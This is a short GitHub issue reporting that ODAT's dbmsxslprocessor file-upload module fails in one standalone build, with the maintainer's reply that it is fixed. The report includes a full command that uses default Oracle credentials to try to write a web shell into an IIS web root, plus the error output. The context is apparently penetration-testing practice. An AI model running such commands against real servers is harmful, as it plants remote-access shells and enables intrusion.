### ISSUE TITLE
dbmsxslprocessor --putFile fails with latest standalone libc2.12

### ISSUE THREAD

**Issue by tsundokul** [quentinhardy/odat#39]
It works although with v2.3 libc 2.5

Error mesage

> /apps/odat-libc2.12-x86_64/odat-libc2.12-x86_64 dbmsxslprocessor -s $T -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot\' 'cmd.aspx' './tools/win/shell.aspx'
> 
> [1] (IP:1521): Put the ./OSCP/tools/win/shell.aspx local file in the C:\inetpub\wwwroot\ path (named cmd.aspx) of the IP server
> [-] The ./OSCP/tools/win/shell.aspx local file was not put in the remote C:\inetpub\wwwroot\ path (named cmd.aspx): `ORA-06550: line 1, column 7: PLS-00306: wrong number or types of arguments in call to 'CLOB2FILE' ORA-06550: line 1, column 7: PL/SQL: Statement ignored`

**Comment by quentinhardy** [comment]
Thanks, fixed in c47824b4e5538679b21e497b9e8faf577720d553. Not yet fixed in standalone version.
